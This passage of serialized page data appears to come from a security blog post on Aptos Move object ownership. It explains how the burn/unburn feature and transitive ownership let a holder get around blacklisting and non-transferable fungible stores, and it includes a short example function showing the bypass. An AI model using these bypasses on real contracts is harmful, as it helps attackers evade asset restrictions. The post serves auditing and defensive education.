503,"children":70504},{"style":385},[70505],{"type":30,"value":10308},{"type":24,"tag":301,"props":70507,"children":70508},{"style":314},[70509],{"type":30,"value":14026},{"type":24,"tag":301,"props":70511,"children":70512},{"style":359},[70513],{"type":30,"value":362},{"type":24,"tag":301,"props":70515,"children":70516},{"style":369},[70517],{"type":30,"value":22398},{"type":24,"tag":301,"props":70519,"children":70520},{"style":359},[70521],{"type":30,"value":70522},")), error",{"type":24,"tag":301,"props":70524,"children":70525},{"style":385},[70526],{"type":30,"value":10308},{"type":24,"tag":301,"props":70528,"children":70529},{"style":314},[70530],{"type":30,"value":70531},"permission_denied",{"type":24,"tag":301,"props":70533,"children":70534},{"style":359},[70535],{"type":30,"value":70536},"(ENOT_STORE_OWNER));\n",{"type":24,"tag":301,"props":70538,"children":70539},{"class":303,"line":439},[70540,70544,70548],{"type":24,"tag":301,"props":70541,"children":70542},{"style":359},[70543],{"type":30,"value":69430},{"type":24,"tag":301,"props":70545,"children":70546},{"style":385},[70547],{"type":30,"value":4054},{"type":24,"tag":301,"props":70549,"children":70550},{"style":359},[70551],{"type":30,"value":4059},{"type":24,"tag":301,"props":70553,"children":70554},{"class":303,"line":447},[70555],{"type":24,"tag":301,"props":70556,"children":70557},{"style":359},[70558],{"type":30,"value":698},{"type":24,"tag":32,"props":70560,"children":70561},{},[70562,70564,70569,70571,70577,70579,70585],{"type":30,"value":70563},"The thing to note is that defining ownership with ",{"type":24,"tag":145,"props":70565,"children":70567},{"className":70566},[],[70568],{"type":30,"value":70306},{"type":30,"value":70570}," can be tricky. The ",{"type":24,"tag":145,"props":70572,"children":70574},{"className":70573},[],[70575],{"type":30,"value":70576},"burn",{"type":30,"value":70578}," function was one of the reasons behind that. It allowed changing the object's owner to the ",{"type":24,"tag":145,"props":70580,"children":70582},{"className":70581},[],[70583],{"type":30,"value":70584},"BURN_ADDRESS",{"type":30,"value":70586}," while bypassing transfer restrictions:",{"type":24,"tag":291,"props":70588,"children":70590},{"className":9818,"code":70589,"language":9817,"meta":7,"style":7},"public entry fun burn\u003CT: key>(owner: &signer, object: Object\u003CT>) acquires ObjectCore {\n let original_owner = signer::address_of(owner);\n assert!(is_owner(object, original_owner), error::permission_denied(ENOT_OBJECT_OWNER));\n let object_addr = object.inner;\n move_to(&create_signer(object_addr), TombStone { original_owner });\n transfer_raw_inner(object_addr, BURN_ADDRESS);\n}\n",[70591],{"type":24,"tag":145,"props":70592,"children":70593},{"__ignoreMap":7},[70594,70691,70732,70782,70811,70861,70882],{"type":24,"tag":301,"props":70595,"children":70596},{"class":303,"line":304},[70597,70601,70605,70609,70614,70618,70622,70626,70630,70634,70638,70642,70646,70650,70654,70658,70662,70666,70670,70674,70678,70682,70687],{"type":24,"tag":301,"props":70598,"children":70599},{"style":369},[70600],{"type":30,"value":68388},{"type":24,"tag":301,"props":70602,"children":70603},{"style":369},[70604],{"type":30,"value":69354},{"type":24,"tag":301,"props":70606,"children":70607},{"style":369},[70608],{"type":30,"value":13026},{"type":24,"tag":301,"props":70610,"children":70611},{"style":369},[70612],{"type":30,"value":70613}," burn",{"type":24,"tag":301,"props":70615,"children":70616},{"style":359},[70617],{"type":30,"value":1849},{"type":24,"tag":301,"props":70619,"children":70620},{"style":10246},[70621],{"type":30,"value":12807},{"type":24,"tag":301,"props":70623,"children":70624},{"style":385},[70625],{"type":30,"value":1679},{"type":24,"tag":301,"props":70627,"children":70628},{"style":369},[70629],{"type":30,"value":12751},{"type":24,"tag":301,"props":70631,"children":70632},{"style":359},[70633],{"type":30,"value":14426},{"type":24,"tag":301,"props":70635,"children":70636},{"style":369},[70637],{"type":30,"value":22398},{"type":24,"tag":301,"props":70639,"children":70640},{"style":385},[70641],{"type":30,"value":1679},{"type":24,"tag":301,"props":70643,"children":70644},{"style":385},[70645],{"type":30,"value":991},{"type":24,"tag":301,"props":70647,"children":70648},{"style":369},[70649],{"type":30,"value":13963},{"type":24,"tag":301,"props":70651,"children":70652},{"style":359},[70653],{"type":30,"value":377},{"type":24,"tag":301,"props":70655,"children":70656},{"style":369},[70657],{"type":30,"value":69622},{"type":24,"tag":301,"props":70659,"children":70660},{"style":385},[70661],{"type":30,"value":1679},{"type":24,"tag":301,"props":70663,"children":70664},{"style":10246},[70665],{"type":30,"value":68274},{"type":24,"tag":301,"props":70667,"children":70668},{"style":359},[70669],{"type":30,"value":1849},{"type":24,"tag":301,"props":70671,"children":70672},{"style":10246},[70673],{"type":30,"value":12807},{"type":24,"tag":301,"props":70675,"children":70676},{"style":359},[70677],{"type":30,"value":27217},{"type":24,"tag":301,"props":70679,"children":70680},{"style":369},[70681],{"type":30,"value":13163},{"type":24,"tag":301,"props":70683,"children":70684},{"style":10246},[70685],{"type":30,"value":70686}," ObjectCore",{"type":24,"tag":301,"props":70688,"children":70689},{"style":359},[70690],{"type":30,"value":3035},{"type":24,"tag":301,"props":70692,"children":70693},{"class":303,"line":320},[70694,70698,70703,70707,70712,70716,70720,70724,70728],{"type":24,"tag":301,"props":70695,"children":70696},{"style":348},[70697],{"type":30,"value":9838},{"type":24,"tag":301,"props":70699,"children":70700},{"style":369},[70701],{"type":30,"value":70702}," original_owner",{"type":24,"tag":301,"props":70704,"children":70705},{"style":385},[70706],{"type":30,"value":2537},{"type":24,"tag":301,"props":70708,"children":70709},{"style":359},[70710],{"type":30,"value":70711}," signer",{"type":24,"tag":301,"props":70713,"children":70714},{"style":385},[70715],{"type":30,"value":10308},{"type":24,"tag":301,"props":70717,"children":70718},{"style":314},[70719],{"type":30,"value":14026},{"type":24,"tag":301,"props":70721,"children":70722},{"style":359},[70723],{"type":30,"value":362},{"type":24,"tag":301,"props":70725,"children":70726},{"style":369},[70727],{"type":30,"value":22398},{"type":24,"tag":301,"props":70729,"children":70730},{"style":359},[70731],{"type":30,"value":589},{"type":24,"tag":301,"props":70733,"children":70734},{"class":303,"line":335},[70735,70739,70743,70748,70752,70756,70760,70765,70769,70773,70777],{"type":24,"tag":301,"props":70736,"children":70737},{"style":314},[70738],{"type":30,"value":69056},{"type":24,"tag":301,"props":70740,"children":70741},{"style":359},[70742],{"type":30,"value":362},{"type":24,"tag":301,"props":70744,"children":70745},{"style":314},[70746],{"type":30,"value":70747},"is_owner",{"type":24,"tag":301,"props":70749,"children":70750},{"style":359},[70751],{"type":30,"value":362},{"type":24,"tag":301,"props":70753,"children":70754},{"style":369},[70755],{"type":30,"value":69622},{"type":24,"tag":301,"props":70757,"children":70758},{"style":359},[70759],{"type":30,"value":377},{"type":24,"tag":301,"props":70761,"children":70762},{"style":369},[70763],{"type":30,"value":70764},"original_owner",{"type":24,"tag":301,"props":70766,"children":70767},{"style":359},[70768],{"type":30,"value":69645},{"type":24,"tag":301,"props":70770,"children":70771},{"style":385},[70772],{"type":30,"value":10308},{"type":24,"tag":301,"props":70774,"children":70775},{"style":314},[70776],{"type":30,"value":70531},{"type":24,"tag":301,"props":70778,"children":70779},{"style":359},[70780],{"type":30,"value":70781},"(ENOT_OBJECT_OWNER));\n",{"type":24,"tag":301,"props":70783,"children":70784},{"class":303,"line":344},[70785,70789,70794,70798,70802,70806],{"type":24,"tag":301,"props":70786,"children":70787},{"style":348},[70788],{"type":30,"value":9838},{"type":24,"tag":301,"props":70790,"children":70791},{"style":369},[70792],{"type":30,"value":70793}," object_addr",{"type":24,"tag":301,"props":70795,"children":70796},{"style":385},[70797],{"type":30,"value":2537},{"type":24,"tag":301,"props":70799,"children":70800},{"style":369},[70801],{"type":30,"value":69206},{"type":24,"tag":301,"props":70803,"children":70804},{"style":385},[70805],{"type":30,"value":206},{"type":24,"tag":301,"props":70807,"children":70808},{"style":359},[70809],{"type":30,"value":70810},"inner;\n",{"type":24,"tag":301,"props":70812,"children":70813},{"class":303,"line":401},[70814,70818,70822,70826,70831,70835,70840,70844,70849,70853,70857],{"type":24,"tag":301,"props":70815,"children":70816},{"style":314},[70817],{"type":30,"value":69809},{"type":24,"tag":301,"props":70819,"children":70820},{"style":359},[70821],{"type":30,"value":362},{"type":24,"tag":301,"props":70823,"children":70824},{"style":385},[70825],{"type":30,"value":556},{"type":24,"tag":301,"props":70827,"children":70828},{"style":314},[70829],{"type":30,"value":70830},"create_signer",{"type":24,"tag":301,"props":70832,"children":70833},{"style":359},[70834],{"type":30,"value":362},{"type":24,"tag":301,"props":70836,"children":70837},{"style":369},[70838],{"type":30,"value":70839},"object_addr",{"type":24,"tag":301,"props":70841,"children":70842},{"style":359},[70843],{"type":30,"value":21967},{"type":24,"tag":301,"props":70845,"children":70846},{"style":10246},[70847],{"type":30,"value":70848},"TombStone",{"type":24,"tag":301,"props":70850,"children":70851},{"style":359},[70852],{"type":30,"value":16392},{"type":24,"tag":301,"props":70854,"children":70855},{"style":369},[70856],{"type":30,"value":70764},{"type":24,"tag":301,"props":70858,"children":70859},{"style":359},[70860],{"type":30,"value":45574},{"type":24,"tag":301,"props":70862,"children":70863},{"class":303,"line":415},[70864,70869,70873,70877],{"type":24,"tag":301,"props":70865,"children":70866},{"style":314},[70867],{"type":30,"value":70868}," transfer_raw_inner",{"type":24,"tag":301,"props":70870,"children":70871},{"style":359},[70872],{"type":30,"value":362},{"type":24,"tag":301,"props":70874,"children":70875},{"style":369},[70876],{"type":30,"value":70839},{"type":24,"tag":301,"props":70878,"children":70879},{"style":359},[70880],{"type":30,"value":70881},", BURN_ADDRESS);\n",{"type":24,"tag":301,"props":70883,"children":70884},{"class":303,"line":439},[70885],{"type":24,"tag":301,"props":70886,"children":70887},{"style":359},[70888],{"type":30,"value":698},{"type":24,"tag":32,"props":70890,"children":70891},{},[70892,70898,70900,70905,70906,70913,70915,70920],{"type":24,"tag":145,"props":70893,"children":70895},{"className":70894},[],[70896],{"type":30,"value":70897},"unburn",{"type":30,"value":70899}," is a way to restore the previous object owner. In a past audit, this mechanism could be exploited to bypass fungible store owner blacklisting by temporarily setting ownership to the unblacklisted ",{"type":24,"tag":145,"props":70901,"children":70903},{"className":70902},[],[70904],{"type":30,"value":70584},{"type":30,"value":6319},{"type":24,"tag":188,"props":70907,"children":70910},{"href":70908,"rel":70909},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-99.md",[192],[70911],{"type":30,"value":70912},"AIP-99",{"type":30,"value":70914}," is a proposal to roll back the ",{"type":24,"tag":145,"props":70916,"children":70918},{"className":70917},[],[70919],{"type":30,"value":70576},{"type":30,"value":70921}," feature, but previously burned objects will remain restorable.",{"type":24,"tag":9770,"props":70923,"children":70924},{},[70925],{"type":24,"tag":32,"props":70926,"children":70927},{},[70928,70929,70933],{"type":30,"value":5293},{"type":24,"tag":301,"props":70930,"children":70931},{},[70932],{"type":30,"value":70912},{"type":30,"value":70934}," seeks to disable safe object burn, as it caused extra complexity, and sometimes unexpected consequences. As a result of this AIP, users will still be able to unburn their burnt objects, but will not be able to burn any new objects.",{"type":24,"tag":32,"props":70936,"children":70937},{},[70938,70940,70946,70948,70953,70955,70960],{"type":30,"value":70939},"Another important thing is that ",{"type":24,"tag":145,"props":70941,"children":70943},{"className":70942},[],[70944],{"type":30,"value":70945},"fungible_asset::set_untransferable",{"type":30,"value":70947}," can be used to make all new ",{"type":24,"tag":145,"props":70949,"children":70951},{"className":70950},[],[70952],{"type":30,"value":69292},{"type":30,"value":70954}," for this asset untransferable, preventing ownership changes. However, this restriction doesn't apply to the parent object, allowing a transferable parent to be moved even if it owns a non-transferable ",{"type":24,"tag":145,"props":70956,"children":70958},{"className":70957},[],[70959],{"type":30,"value":68788},{"type":30,"value":206},{"type":24,"tag":32,"props":70962,"children":70963},{},[70964,70966,70971,70973,70979,70981,70986,70988,70993],{"type":30,"value":70965},"Do we need to care about this case? We do, because ownership is transitive. If entity X owns an object that owns a ",{"type":24,"tag":145,"props":70967,"children":70969},{"className":70968},[],[70970],{"type":30,"value":68788},{"type":30,"value":70972},", X can withdraw from that store. This is because ",{"type":24,"tag":145,"props":70974,"children":70976},{"className":70975},[],[70977],{"type":30,"value":70978},"fungible_asset::withdraw",{"type":30,"value":70980}," uses ",{"type":24,"tag":145,"props":70982,"children":70984},{"className":70983},[],[70985],{"type":30,"value":70306},{"type":30,"value":70987}," to verify both direct and indirect ownership of the ",{"type":24,"tag":145,"props":70989,"children":70991},{"className":70990},[],[70992],{"type":30,"value":68788},{"type":30,"value":56907},{"type":24,"tag":291,"props":70995,"children":70997},{"className":9818,"code":70996,"language":9817,"meta":7,"style":7},"fun verify_ungated_and_descendant(owner: address, destination: address) acquires ObjectCore {\n [...]\n while (owner != current_address) {\n count = count + 1;\n [...]\n assert!(\n exists\u003CObjectCore>(current_address),\n error::permission_denied(ENOT_OBJECT_OWNER),\n );\n let object = borrow_global\u003CObjectCore>(current_address);\n current_address = object.owner;\n };\n}\n",[70998],{"type":24,"tag":145,"props":70999,"children":71000},{"__ignoreMap":7},[71001,71062,71078,71108,71137,71152,71164,71194,71215,71222,71262,71287,71294],{"type":24,"tag":301,"props":71002,"children":71003},{"class":303,"line":304},[71004,71008,71013,71017,71021,71025,71029,71033,71038,71042,71046,71050,71054,71058],{"type":24,"tag":301,"props":71005,"children":71006},{"style":369},[71007],{"type":30,"value":13925},{"type":24,"tag":301,"props":71009,"children":71010},{"style":314},[71011],{"type":30,"value":71012}," verify_ungated_and_descendant",{"type":24,"tag":301,"props":71014,"children":71015},{"style":359},[71016],{"type":30,"value":362},{"type":24,"tag":301,"props":71018,"children":71019},{"style":369},[71020],{"type":30,"value":22398},{"type":24,"tag":301,"props":71022,"children":71023},{"style":385},[71024],{"type":30,"value":1679},{"type":24,"tag":301,"props":71026,"children":71027},{"style":369},[71028],{"type":30,"value":13069},{"type":24,"tag":301,"props":71030,"children":71031},{"style":359},[71032],{"type":30,"value":377},{"type":24,"tag":301,"props":71034,"children":71035},{"style":369},[71036],{"type":30,"value":71037},"destination",{"type":24,"tag":301,"props":71039,"children":71040},{"style":385},[71041],{"type":30,"value":1679},{"type":24,"tag":301,"props":71043,"children":71044},{"style":369},[71045],{"type":30,"value":13069},{"type":24,"tag":301,"props":71047,"children":71048},{"style":359},[71049],{"type":30,"value":911},{"type":24,"tag":301,"props":71051,"children":71052},{"style":369},[71053],{"type":30,"value":13163},{"type":24,"tag":301,"props":71055,"children":71056},{"style":10246},[71057],{"type":30,"value":70686},{"type":24,"tag":301,"props":71059,"children":71060},{"style":359},[71061],{"type":30,"value":3035},{"type":24,"tag":301,"props":71063,"children":71064},{"class":303,"line":320},[71065,71070,71074],{"type":24,"tag":301,"props":71066,"children":71067},{"style":359},[71068],{"type":30,"value":71069}," [",{"type":24,"tag":301,"props":71071,"children":71072},{"style":385},[71073],{"type":30,"value":4054},{"type":24,"tag":301,"props":71075,"children":71076},{"style":359},[71077],{"type":30,"value":4059},{"type":24,"tag":301,"props":71079,"children":71080},{"class":303,"line":335},[71081,71086,71090,71094,71099,71104],{"type":24,"tag":301,"props":71082,"children":71083},{"style":308},[71084],{"type":30,"value":71085}," while",{"type":24,"tag":301,"props":71087,"children":71088},{"style":359},[71089],{"type":30,"value":873},{"type":24,"tag":301,"props":71091,"children":71092},{"style":369},[71093],{"type":30,"value":22398},{"type":24,"tag":301,"props":71095,"children":71096},{"style":385},[71097],{"type":30,"value":71098}," !=",{"type":24,"tag":301,"props":71100,"children":71101},{"style":369},[71102],{"type":30,"value":71103}," current_address",{"type":24,"tag":301,"props":71105,"children":71106},{"style":359},[71107],{"type":30,"value":398},{"type":24,"tag":301,"props":71109,"children":71110},{"class":303,"line":344},[71111,71116,71120,71125,71129,71133],{"type":24,"tag":301,"props":71112,"children":71113},{"style":369},[71114],{"type":30,"value":71115}," count",{"type":24,"tag":301,"props":71117,"children":71118},{"style":385},[71119],{"type":30,"value":2537},{"type":24,"tag":301,"props":71121,"children":71122},{"style":369},[71123],{"type":30,"value":71124}," count",{"type":24,"tag":301,"props":71126,"children":71127},{"style":385},[71128],{"type":30,"value":957},{"type":24,"tag":301,"props":71130,"children":71131},{"style":466},[71132],{"type":30,"value":487},{"type":24,"tag":301,"props":71134,"children":71135},{"style":359},[71136],{"type":30,"value":492},{"type":24,"tag":301,"props":71138,"children":71139},{"class":303,"line":401},[71140,71144,71148],{"type":24,"tag":301,"props":71141,"children":71142},{"style":359},[71143],{"type":30,"value":71069},{"type":24,"tag":301,"props":71145,"children":71146},{"style":385},[71147],{"type":30,"value":4054},{"type":24,"tag":301,"props":71149,"children":71150},{"style":359},[71151],{"type":30,"value":4059},{"type":24,"tag":301,"props":71153,"children":71154},{"class":303,"line":415},[71155,71160],{"type":24,"tag":301,"props":71156,"children":71157},{"style":314},[71158],{"type":30,"value":71159}," assert!",{"type":24,"tag":301,"props":71161,"children":71162},{"style":359},[71163],{"type":30,"value":1707},{"type":24,"tag":301,"props":71165,"children":71166},{"class":303,"line":439},[71167,71172,71176,71181,71185,71190],{"type":24,"tag":301,"props":71168,"children":71169},{"style":369},[71170],{"type":30,"value":71171}," exists",{"type":24,"tag":301,"props":71173,"children":71174},{"style":359},[71175],{"type":30,"value":1849},{"type":24,"tag":301,"props":71177,"children":71178},{"style":10246},[71179],{"type":30,"value":71180},"ObjectCore",{"type":24,"tag":301,"props":71182,"children":71183},{"style":359},[71184],{"type":30,"value":14426},{"type":24,"tag":301,"props":71186,"children":71187},{"style":369},[71188],{"type":30,"value":71189},"current_address",{"type":24,"tag":301,"props":71191,"children":71192},{"style":359},[71193],{"type":30,"value":4656},{"type":24,"tag":301,"props":71195,"children":71196},{"class":303,"line":447},[71197,71202,71206,71210],{"type":24,"tag":301,"props":71198,"children":71199},{"style":359},[71200],{"type":30,"value":71201}," error",{"type":24,"tag":301,"props":71203,"children":71204},{"style":385},[71205],{"type":30,"value":10308},{"type":24,"tag":301,"props":71207,"children":71208},{"style":314},[71209],{"type":30,"value":70531},{"type":24,"tag":301,"props":71211,"children":71212},{"style":359},[71213],{"type":30,"value":71214},"(ENOT_OBJECT_OWNER),\n",{"type":24,"tag":301,"props":71216,"children":71217},{"class":303,"line":476},[71218],{"type":24,"tag":301,"props":71219,"children":71220},{"style":359},[71221],{"type":30,"value":14559},{"type":24,"tag":301,"props":71223,"children":71224},{"class":303,"line":495},[71225,71229,71233,71237,71242,71246,71250,71254,71258],{"type":24,"tag":301,"props":71226,"children":71227},{"style":348},[71228],{"type":30,"value":9900},{"type":24,"tag":301,"props":71230,"children":71231},{"style":369},[71232],{"type":30,"value":69206},{"type":24,"tag":301,"props":71234,"children":71235},{"style":385},[71236],{"type":30,"value":2537},{"type":24,"tag":301,"props":71238,"children":71239},{"style":369},[71240],{"type":30,"value":71241}," borrow_global",{"type":24,"tag":301,"props":71243,"children":71244},{"style":359},[71245],{"type":30,"value":1849},{"type":24,"tag":301,"props":71247,"children":71248},{"style":10246},[71249],{"type":30,"value":71180},{"type":24,"tag":301,"props":71251,"children":71252},{"style":359},[71253],{"type":30,"value":14426},{"type":24,"tag":301,"props":71255,"children":71256},{"style":369},[71257],{"type":30,"value":71189},{"type":24,"tag":301,"props":71259,"children":71260},{"style":359},[71261],{"type":30,"value":589},{"type":24,"tag":301,"props":71263,"children":71264},{"class":303,"line":504},[71265,71270,71274,71278,71282],{"type":24,"tag":301,"props":71266,"children":71267},{"style":369},[71268],{"type":30,"value":71269}," current_address",{"type":24,"tag":301,"props":71271,"children":71272},{"style":385},[71273],{"type":30,"value":2537},{"type":24,"tag":301,"props":71275,"children":71276},{"style":369},[71277],{"type":30,"value":69206},{"type":24,"tag":301,"props":71279,"children":71280},{"style":385},[71281],{"type":30,"value":206},{"type":24,"tag":301,"props":71283,"children":71284},{"style":359},[71285],{"type":30,"value":71286},"owner;\n",{"type":24,"tag":301,"props":71288,"children":71289},{"class":303,"line":512},[71290],{"type":24,"tag":301,"props":71291,"children":71292},{"style":359},[71293],{"type":30,"value":3085},{"type":24,"tag":301,"props":71295,"children":71296},{"class":303,"line":592},[71297],{"type":24,"tag":301,"props":71298,"children":71299},{"style":359},[71300],{"type":30,"value":698},{"type":24,"tag":32,"props":71302,"children":71303},{},[71304,71306,71311],{"type":30,"value":71305},"This could allow for bypassing assumptions about ",{"type":24,"tag":145,"props":71307,"children":71309},{"className":71308},[],[71310],{"type":30,"value":68788},{"type":30,"value":71312}," true ownership and its non-transferability.",{"type":24,"tag":291,"props":71314,"children":71316},{"className":9818,"code":71315,"language":9817,"meta":7,"style":7},"public fun untransferable_transfer(caller: &signer, receipient: address) {\n let constructor_ref = object::create_object(signer::address_of(caller));\n let object_addr = object::address_from_constructor_ref(&constructor_ref);\n let store = primary_fungible_store::ensure_primary_store_exists(object_addr, get_metadata());\n\n object::transfer_raw(caller, object_addr, receipient);\n //receipient can interact with store by using their signer\n}\n",[71317],{"type":24,"tag":145,"props":71318,"children":71319},{"__ignoreMap":7},[71320,71378,71431,71475,71523,71530,71575,71583],{"type":24,"tag":301,"props":71321,"children":71322},{"class":303,"line":304},[71323,71327,71331,71336,71340,71345,71349,71353,71357,71361,71366,71370,71374],{"type":24,"tag":301,"props":71324,"children":71325},{"style":369},[71326],{"type":30,"value":68388},{"type":24,"tag":301,"props":71328,"children":71329},{"style":369},[71330],{"type":30,"value":13026},{"type":24,"tag":301,"props":71332,"children":71333},{"style":314},[71334],{"type":30,"value":71335}," untransferable_transfer",{"type":24,"tag":301,"props":71337,"children":71338},{"style":359},[71339],{"type":30,"value":362},{"type":24,"tag":301,"props":71341,"children":71342},{"style":369},[71343],{"type":30,"value":71344},"caller",{"type":24,"tag":301,"props":71346,"children":71347},{"style":385},[71348],{"type":30,"value":1679},{"type":24,"tag":301,"props":71350,"children":71351},{"style":385},[71352],{"type":30,"value":991},{"type":24,"tag":301,"props":71354,"children":71355},{"style":369},[71356],{"type":30,"value":13963},{"type":24,"tag":301,"props":71358,"children":71359},{"style":359},[71360],{"type":30,"value":377},{"type":24,"tag":301,"props":71362,"children":71363},{"style":369},[71364],{"type":30,"value":71365},"receipient",{"type":24,"tag":301,"props":71367,"children":71368},{"style":385},[71369],{"type":30,"value":1679},{"type":24,"tag":301,"props":71371,"children":71372},{"style":369},[71373],{"type":30,"value":13069},{"type":24,"tag":301,"props":71375,"children":71376},{"style":359},[71377],{"type":30,"value":398},{"type":24,"tag":301,"props":71379,"children":71380},{"class":303,"line":320},[71381,71385,71390,71394,71398,71402,71407,71411,71415,71419,71423,71427],{"type":24,"tag":301,"props":71382,"children":71383},{"style":348},[71384],{"type":30,"value":9838},{"type":24,"tag":301,"props":71386,"children":71387},{"style":369},[71388],{"type":30,"value":71389}," constructor_ref",{"type":24,"tag":301,"props":71391,"children":71392},{"style":385},[71393],{"type":30,"value":2537},{"type":24,"tag":301,"props":71395,"children":71396},{"style":359},[71397],{"type":30,"value":69206},{"type":24,"tag":301,"props":71399,"children":71400},{"style":385},[71401],{"type":30,"value":10308},{"type":24,"tag":301,"props":71403,"children":71404},{"style":314},[71405],{"type":30,"value":71406},"create_object",{"type":24,"tag":301,"props":71408,"children":71409},{"style":359},[71410],{"type":30,"value":14017},{"type":24,"tag":301,"props":71412,"children":71413},{"style":385},[71414],{"type":30,"value":10308},{"type":24,"tag":301,"props":71416,"children":71417},{"style":314},[71418],{"type":30,"value":14026},{"type":24,"tag":301,"props":71420,"children":71421},{"style":359},[71422],{"type":30,"value":362},{"type":24,"tag":301,"props":71424,"children":71425},{"style":369},[71426],{"type":30,"value":71344},{"type":24,"tag":301,"props":71428,"children":71429},{"style":359},[71430],{"type":30,"value":3416},{"type":24,"tag":301,"props":71432,"children":71433},{"class":303,"line":335},[71434,71438,71442,71446,71450,71454,71459,71463,71467,71471],{"type":24,"tag":301,"props":71435,"children":71436},{"style":348},[71437],{"type":30,"value":9838},{"type":24,"tag":301,"props":71439,"children":71440},{"style":369},[71441],{"type":30,"value":70793},{"type":24,"tag":301,"props":71443,"children":71444},{"style":385},[71445],{"type":30,"value":2537},{"type":24,"tag":301,"props":71447,"children":71448},{"style":359},[71449],{"type":30,"value":69206},{"type":24,"tag":301,"props":71451,"children":71452},{"style":385},[71453],{"type":30,"value":10308},{"type":24,"tag":301,"props":71455,"children":71456},{"style":314},[71457],{"type":30,"value":71458},"address_from_constructor_ref",{"type":24,"tag":301,"props":71460,"children":71461},{"style":359},[71462],{"type":30,"value":362},{"type":24,"tag":301,"props":71464,"children":71465},{"style":385},[71466],{"type":30,"value":556},{"type":24,"tag":301,"props":71468,"children":71469},{"style":369},[71470],{"type":30,"value":69640},{"type":24,"tag":301,"props":71472,"children":71473},{"style":359},[71474],{"type":30,"value":589},{"type":24,"tag":301,"props":71476,"children":71477},{"class":303,"line":344},[71478,71482,71486,71490,71495,71499,71503,71507,71511,71515,71519],{"type":24,"tag":301,"props":71479,"children":71480},{"style":348},[71481],{"type":30,"value":9838},{"type":24,"tag":301,"props":71483,"children":71484},{"style":369},[71485],{"type":30,"value":12651},{"type":24,"tag":301,"props":71487,"children":71488},{"style":385},[71489],{"type":30,"value":2537},{"type":24,"tag":301,"props":71491,"children":71492},{"style":359},[71493],{"type":30,"value":71494}," primary_fungible_store",{"type":24,"tag":301,"props":71496,"children":71497},{"style":385},[71498],{"type":30,"value":10308},{"type":24,"tag":301,"props":71500,"children":71501},{"style":314},[71502],{"type":30,"value":69532},{"type":24,"tag":301,"props":71504,"children":71505},{"style":359},[71506],{"type":30,"value":362},{"type":24,"tag":301,"props":71508,"children":71509},{"style":369},[71510],{"type":30,"value":70839},{"type":24,"tag":301,"props":71512,"children":71513},{"style":359},[71514],{"type":30,"value":377},{"type":24,"tag":301,"props":71516,"children":71517},{"style":314},[71518],{"type":30,"value":69488},{"type":24,"tag":301,"props":71520,"children":71521},{"style":359},[71522],{"type":30,"value":22214},{"type":24,"tag":301,"props":71524,"children":71525},{"class":303,"line":401},[71526],{"type":24,"tag":301,"props":71527,"children":71528},{"emptyLinePlaceholder":16},[71529],{"type":30,"value":341},{"type":24,"tag":301,"props":71531,"children":71532},{"class":303,"line":415},[71533,71538,71542,71547,71551,71555,71559,71563,71567,71571],{"type":24,"tag":301,"props":71534,"children":71535},{"style":359},[71536],{"type":30,"value":71537}," object",{"type":24,"tag":301,"props":71539,"children":71540},{"style":385},[71541],{"type":30,"value":10308},{"type":24,"tag":301,"props":71543,"children":71544},{"style":314},[71545],{"type":30,"value":71546},"transfer_raw",{"type":24,"tag":301,"props":71548,"children":71549},{"style":359},[71550],{"type":30,"value":362},{"type":24,"tag":301,"props":71552,"children":71553},{"style":369},[71554],{"type":30,"value":71344},{"type":24,"tag":301,"props":71556,"children":71557},{"style":359},[71558],{"type":30,"value":377},{"type":24,"tag":301,"props":71560,"children":71561},{"style":369},[71562],{"type":30,"value":70839},{"type":24,"tag":301,"props":71564,"children":71565},{"style":359},[71566],{"type":30,"value":377},{"type":24,"tag":301,"props":71568,"children":71569},{"style":369},[71570],{"type":30,"value":71365},{"type":24,"tag":301,"props":71572,"children":71573},{"style":359},[71574],{"type":30,"value":589},{"type":24,"tag":301,"props":71576,"children":71577},{"class":303,"line":439},[71578],{"type":24,"tag":301,"props":71579,"children":71580},{"style":1062},[71581],{"type":30,"value":71582}," //receipient can interact with store by using their signer\n",{"type":24,"tag":301,"props":71584,"children":71585},{"class":303,"line":447},[71586],{"type":24,"tag":301,"props":71587,"children":71588},{"style":359},[71589],{"type":30,"value":698},{"type":24,"tag":32,"props":71591,"children":71592},{},[71593,71595,71602],{"type":30,"value":71594},"The ownership transfer issue also showed up during our review of the fungible asset standard, where we identified an interesting ",{"type":24,"tag":188,"props":71596,"children":71599},{"href":71597,"rel":71598},"https://github.com/aptos-labs/aptos-core/commit/e8c5e4bd03930d25f0dbec9529680fac36eb2fa6",[192],[71600],{"type":30,"value":71601},"edge case",{"type":30,"value":71603}," involving the transfer of a non-transferable fungible store.",{"type":24,"tag":291,"props":71605,"children":71607},{"className":9818,"code":71606,"language":9817,"meta":7,"style":7},"public fun transfer_with_ref(ref: LinearTransferRef, to: address) acquires ObjectCore {\n assert!(!exists\u003CUntransferable>(ref.self), error::permission_denied(ENOT_MOVABLE));\n let object = borrow_global_mut\u003CObjectCore>(ref.self);\n assert!(\n object.owner == ref.owner,\n error::permission_denied(ENOT_OBJECT_OWNER),\n );\n \n [...]\n \n object.owner = to;\n}\n",[71608],{"type":24,"tag":145,"props":71609,"children":71610},{"__ignoreMap":7},[71611,71676,71737,71784,71795,71830,71850,71857,71864,71879,71886,71914],{"type":24,"tag":301,"props":71612,"children":71613},{"class":303,"line":304},[71614,71618,71622,71627,71631,71635,71639,71644,71648,71652,71656,71660,71664,71668,71672],{"type":24,"tag":301,"props":71615,"children":71616},{"style":369},[71617],{"type":30,"value":68388},{"type":24,"tag":301,"props":71619,"children":71620},{"style":369},[71621],{"type":30,"value":13026},{"type":24,"tag":301,"props":71623,"children":71624},{"style":314},[71625],{"type":30,"value":71626}," transfer_with_ref",{"type":24,"tag":301,"props":71628,"children":71629},{"style":359},[71630],{"type":30,"value":362},{"type":24,"tag":301,"props":71632,"children":71633},{"style":348},[71634],{"type":30,"value":70049},{"type":24,"tag":301,"props":71636,"children":71637},{"style":385},[71638],{"type":30,"value":1679},{"type":24,"tag":301,"props":71640,"children":71641},{"style":10246},[71642],{"type":30,"value":71643}," 